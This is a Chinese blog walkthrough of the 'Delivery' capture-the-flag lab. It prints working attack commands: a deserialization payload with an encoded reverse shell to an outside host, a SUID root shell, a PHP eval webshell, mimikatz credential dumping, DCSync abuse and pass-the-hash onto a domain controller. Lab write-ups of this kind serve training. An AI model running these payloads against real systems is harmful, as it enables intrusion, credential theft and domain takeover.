【内网渗透】最保姆级的春秋云镜Delivery打靶笔记

于 2024-09-15 19:29:21 发布
阅读量802 收藏 7
点赞数 8
文章标签: 春秋云镜 Delivery 内网渗透 渗透 wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/uuzeray/article/details/142283124
版权

目录

flag1

flag2

flag3 

flag4

flag1

fscan扫外网

匿名连接ftp

ftp 39.98.122.67
anonymous

get pom.xml

 

pom.xml里有xstream和cc依赖

 

访问http://39.98.122.67:8080/ 是一个web

 随便填一下数据抓包发现是以xml格式传输数据,可以打用xstream反序列化打CC依赖

 vulhub/xstream/CVE-2021-29505/README.zh-cn.md at master · vulhub/vulhub · GitHub

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1338 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}"

成功弹上shell

读到flag1

flag2

 wget下载frp和fscan,扫内网,搭隧道

172.22.13.14 本机
172.22.13.57 CentOS
172.22.13.28 OA系统、mysql弱口令root/123456
172.22.13.6  WIN-DC DC域 

第二关提示要打NFS 

 

 扫一下2049端口

 NFS漏洞利用

靶机上下载nfs_offline

nfs_offline_install.sh

wget http://archive.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.3.4-2.5ubuntu3_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libn/libnfsidmap/libnfsidmap2_0.25-5.1ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc3_1.2.5-1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/r/rpcbind/rpcbind_1.2.5-8_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/k/keyutils/keyutils_1.6-6ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc-common_1.2.5-1_all.deb
sudo dpkg -i libnfsidmap2_0.25-5.1ubuntu1_amd64.deb && \
sudo dpkg -i libtirpc-common_1.2.5-1_all.deb && \
sudo dpkg -i libtirpc3_1.2.5-1_amd64.deb && \
sudo dpkg -i rpcbind_1.2.5-8_amd64.deb && \
sudo dpkg -i keyutils_1.6-6ubuntu1_amd64.deb && \
sudo dpkg -i nfs-common_1.3.4-2.5ubuntu3_amd64.deb
showmount -e 172.22.13.57

mkdir temp
mount -t nfs 172.22.13.57:/ ./temp -o nolock

写入ssh公钥 

ssh-keygen -t rsa -b 4096
cd /temp/home/joyce/
mkdir .ssh
cat /root/.ssh/id_rsa.pub >> /temp/home/joyce/.ssh/authorized_keys

编译恶意c文件,给到suid root

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > root.c
gcc root.c -o root
chmod +s root

私钥连接ssh,起一个交互shell 

ssh -i /root/.ssh/id_rsa joyce@172.22.13.57
python3 -c 'import pty;pty.spawn("/bin/bash")'

 

 运行恶意提权文件拿到root

 读到flag2

flag3 

然后打之前内网扫出来的mysql

navicat连root/123456

show variables like "secure_file_priv";
show variables like "%general%";

发现是phpstudy起的服务,并且可以写web文件 

 

写webshell 

select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php";

 连蚁剑

读到flag3

 

 

flag4

还差个WIN-DC要打

先新建个用户rdp上去方便以管理员身份操作

 

上传猕猴桃抓下密码

privilege::debug
sekurlsa::logonpasswords

抓到机器用户的NTLM哈希

 打pth拿到SYSTEM

sekurlsa::pth /user:WIN-HAUWOLAO$ /domain:XIAORANG.LAB /ntlm:f50cf41c345d71bc9b862d3568f5b303

BloodHound搜集一下信息 

WIN-HAUWOLAO有CHENGLEI的session,而CHENGLEI属于ACL Admins 组,ACL Admins 组对 WIN-DC 具有 WriteDacl 权限

前面猕猴桃也抓到了chenglei的哈希

给chenglei去添加DCSync权限

proxychains4 python dacledit.py xiaorang.lab/chenglei -hashes :0c00801c30594a1b8eaa889d237c5382 -action write -rights DCSync -principal chenglei -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.13.6

 dump下来域管的哈希

proxychains4 impacket-secretsdump xiaorang.lab/chenglei@172.22.13.6 -hashes :0c00801c30594a1b8eaa889d237c5382 -just-dc-ntlm

pth横向

proxychains4 python psexec.py -hashes :6341235defdaed66fb7b682665752c9a XIAORANG/Administrator@172.22.13.6

读到flag4

 

Z3r4y
关注
内网渗透(一)之基础知识-内网渗透介绍和概述
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-03 1860
研究内网安全我们首先需要弄明白内网是什么?在渗透测试过程中我们一般把因特网称为外网,而将其余的网络(政务网、公安网、企业内网等)定义为内网。后来我仔细思考了一下,内外网的概念其实是相对而言的,比如一台电脑同处于办公室内的小型局域网和公司的大型局域网内,那么就可以把办公室内的局域网称为内网,公司的大型局域网称为外网。而通常情况下我们会同处于公司网和因特网之内,那么就会常常把因特网称为外网,公司网称为内网,久而久之这种概念也就形成了。
春秋云镜-Delivery-Writeup
qq_35607078的博客
07-22 576
春秋云镜-Delivery-Writeup
春秋云境Delivery-WP【一遍过】
weixin_63576152的博客
10-16 350
设置日志路径为网站根目录(这里因为知道使用了phpstudy所以改的默认网站根目录),并把文件格式修改为相应的后缀名。在vps上开放1099端口,然后用yso起一下服务(base64中的端口为vps监听的端口)在给chenglei添加DCSync权限后,用secretsdump.py获取管理员hash。根据题目提示打NFS,应该就是172.22.13.57中CentOS开的服务,试一试。利用ftp,因为172.22.13.14没开ftp,所以要用python起一个ftp。
sql注入(get型)漏洞
qq_58970968的博客
03-29 2045
1,概念 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 一,攻击过程 信息探测 kali里面主要下面三个探测方式: ·扫描主机服务信息以及服务版本 -- nmap -sV 靶场IP地址 如下图所示: ·快速扫描主机全部信息 -- nmap -T4 -A -v 靶场IP地址 这个与上面的比较起来扫描时间会更多,但信息会更
春秋云镜-Unauthorized-Writeup
qq_35607078的博客
07-12 4294
春秋云镜-Unauthorized-Writeup
从PHP开始学渗透 -- GET请求和POST请求
weixin_41489908的博客
05-07 1207
​成年人只管利益,小孩子才分对错。。。 ---- 网易云热评 一、GET请求 1、get可以理解为一个系统定义好的数组 2、通过var_dump看一下GET的类型,浏览器访问网址,后面加上"?aiyou=bucuo",相当与数组名为GET,键是aiyou,值是bucuo 3、一般get请求都是访问某个文件 4、通过GET写文件 <?php$a=$_GET['aiyou'];//取键为aiyou的值$b=fopen("aiyou.txt", "w+");//打开文件fw...
掌握内网渗透之道,成为实战高手,看《内网渗透实战攻略》就够了
最新发布
等风来
01-10 3016
当今,网络系统面临着越来越严峻的安全挑战。在众多的安全挑战中,一种有组织、有特定目标、长时间持续的新型网络攻击日益猖獗,国际上常称之为APT(Advanced Persistent Threat,高持续性威胁)攻击。传统的渗透测试从外网发起攻击,并以攻破单台主机为目标。与之相比,APT攻击在技术上更加系统地实现了对目标内网主机的大批量控制,从而使业内对内网渗透技术的关注度提高到了一个空前的高度。
CTF内网渗透笔记
qq_26579613的博客
11-10 4033
一、漏洞挖掘相关工具的使用 NMAP扫描工具使用 1.扫描指定的IP范围 nmap 192.168.0.101-110 2.扫描指定的IP网段 nmap 192.168.0.* --exclude 192.168.0.100 3.扫描指定网址的操作系统类型(深度扫描) nmap -A 192.168.0.101 or nmap -O 192.168.0.101 4.扫描网络内活跃的主机(该命令会跳过端口扫描或检测) nmap -sP 192.168.0.* 5.快速扫描主
《内网安全攻防:渗透测试实战指南》读书笔记(七):跨域攻击分析及防御
闵行小鱼塘
04-19 2912
本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,本章是跨域攻击分析及防御,对利用域信任关系实现跨域攻击的典型方法进行了分析,并对如何部署安全的内网生产环境给出了建议,内容非常简短
内网渗透基础总结
wulanlin的博客
01-06 2339
研究内网安全我们首先需要弄明白内网是什么?在渗透测试过程中我们一般把因特网称为外网,而将其余的网络(政务网、公安网、企业内网等)定义为内网。后来我仔细思考了一下,内外网的概念其实是相对而言的,比如一台电脑同处于办公室内的小型局域网和公司的大型局域网内,那么就可以把办公室内的局域网称为内网,公司的大型局域网称为外网。而通常情况下我们会同处于公司网和因特网之内,那么就会常常把因特网称为外网,公司网称为内网,久而久之这种概念也就形成了。内网相对于外网来说通信更快、传输文件更方便、共享更便利,但是相对来说安全性也更
SQL注入知识点总结
千寻的博客
02-11 1621
文章目录第一章 概述第一节 简介第二章 SQL 注入基础第一节 漏洞原理第二节 注入点可能存在的位置第三节 漏洞危害第三章 SQL注入分类第四章 MYSQL 相关第一节 注释第二节 mysql 元数据库数据库information_schema第三节 MYSQL 常用函数与参数第四节 逻辑运算第五章 注入流程第一节 SQL 注入思路第二节 注入点判断第三节 联合查询第四节 报错注入第五节 ...
渗透测试 post请求和get请求的区别
weixin_52194536的博客
07-18 708
post请求与get请求
网站渗透总结之Getshell用法大全
LinkSLA的博客
11-07 2801
后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库
百万人都在求的网络安全学习路线,渗透漏洞防御总结(附图)
2201_75362610的博客
03-17 230
前言不折腾的网络安全,和咸鱼有什么区别目录二、 前言三 、同源策略3.1 什么是同源策略3.2 为什么需要同源策略四 、XSS4.1 概览4.2 介绍4.3 防御五 、CSRF5.1 概览5.2 介绍5.3 防御六、 SQL 注入七 、流量劫持7.1 DNS 劫持7.2 HTTP 劫持八 、浏览器网络安全九、 浏览器系统安全十 、参考文献。
靶机练习:获取外网getshell进行内网渗透测试
weixin_45906324的博客
11-21 1379
实验靶场联系笔记 文章目录实验靶场联系笔记搭建环境实验工具实验要求实验流程 搭建环境 vmware导入两台靶场并开机,靶机下载地址 https://pan.baidu.com/s/1xd8MdGwqZqErtvu0QO5d5A 提取码 xbb5 然后配置物理机网卡的vmnet8ip 为100网段,192.168.100.1 实验工具 VMware® Workstation 15 Pro 版本:15...
渗透测试小菜鸡开课了-手工SQL注入之GET型
qq_53238442的博客
10-19 2039
GET型SQL注入的最大特点:它的参数内容会显示在请求行,如下图???? pikachu靶场: DVWA靶场: 手工注入MysqlGET型有回显的一般步骤: 判断是否存在注入及注入类型: 猜测字段数: 查看输出点: 查看数据库名称及版本: 查看数据库中存在的表: 查看表中有哪些字段: 查看对应字段内容: 总结: 手工注入MysqlGET型有回显的一般步骤: 判断是否存在注入及注入类型: 判断是否存在注入 1、通过在参数后面加一个单引号‘,如果页面出错,则存在SQL注入
web渗透—— SQL基于GET POST注入
王嘟嘟的博客
04-16 4912
0x00 前言 之前我们学习了这些知识。 0x01 小知识 1.万能登录 1' or 1=1 # 2. 判断字段数 uname=123' order by 2 # &amp;passwd=&amp;submit=Submit 3. 联合查询 uname=123' union select 1,2 # &amp;passwd=&amp;submit=Submit ...
安鸾渗透实战平台|SQL数字型GET注入02
m_de_g的博客
12-04 1540
安鸾渗透实战平台|SQL数字型GET注入02 一、渗透靶场地址 http://whalwl.work:8034/ 二、渗透实战 1.开始以为渗透后台,避免采坑 admin' or 1=1 # 123 直接就进入后台啦 2.实战开始,在搜索中输入1',报错 1' 3.当我们在后面加个#时,正常回显 1'# 4.判断or,and,空格或等号是否被过滤 1' or 1=1# 1' and 1=1# 根据报错信息,发现过滤了等号,使用like绕过 1' or 1 like 1# 1' a
渗透技术实战指南:内网渗透详解
资源摘要信息:《内网渗透:域渗透技术实战指南(域渗透一条龙)》是一本专注于内网渗透技术的实战指南书籍。该指南详细介绍了在企业或组织内部网络中进行渗透测试的全过程,特别是针对活动目录(Active Directory,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值